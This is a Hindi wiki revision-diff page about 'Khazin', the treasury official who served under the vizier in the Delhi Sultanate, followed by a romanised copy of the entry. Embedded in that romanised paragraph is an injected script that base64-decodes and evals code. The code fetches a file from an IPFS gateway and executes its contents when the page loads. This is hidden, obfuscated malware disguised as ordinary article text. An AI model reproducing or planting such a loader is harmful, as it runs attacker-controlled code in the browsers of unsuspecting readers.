Difference between revisions of "ख़ज़ीन"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
'''ख़ज़ीन''' (ख़ज़ांची)  
+
'''ख़ज़ीन''' (ख़ज़ांची) [[भारत का इतिहास|भारत के इतिहास]] में [[सल्तनत काल]] के दौरान 'ख़ज़ीन' कोषाध्यक्ष के रूप में कार्य करता था और [[वज़ीर]] का अधीनस्थ होता था।
 
 
[[भारत का इतिहास|भारत के इतिहास]] में [[सल्तनत काल]] के दौरान 'ख़ज़ीन' कोषाध्यक्ष के रूप में कार्य करता था और [[वज़ीर]] का अधीनस्थ होता था।
 
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
Line 9: Line 7:
  
 
==संबंधित लेख==
 
==संबंधित लेख==
 +
{{सल्तनतकालीन प्रशासन}}
 
[[Category:इतिहास कोश]]
 
[[Category:इतिहास कोश]]
 
[[Category:दिल्ली सल्तनत]]
 
[[Category:दिल्ली सल्तनत]]
[[Category:नया पन्ना सितंबर-2011]]
+
[[Category:प्राचीन शासन-प्रशासन]]
 
 
 
__INDEX__
 
__INDEX__
 +
__NOTOC__

Revision as of 13:44, 10 September 2011

khazin (khazaanchi) bharat ke itihas mean saltanat kal ke dauran 'khazin' koshadhyaksh ke roop mean kary karata tha aur vazir ka adhinasth hota tha. <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh


bahari k diyaan

sanbandhit lekh